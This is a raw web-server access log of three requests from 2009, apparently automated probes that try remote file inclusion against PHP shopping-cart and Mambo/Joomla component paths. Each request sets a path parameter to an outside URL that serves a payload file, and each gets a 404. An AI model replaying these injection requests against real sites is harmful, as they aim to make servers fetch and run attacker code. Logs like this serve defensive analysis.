85.17.162.28 - - [26/Jun/2009:18:35:00 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:36:24 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:18:36:24 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
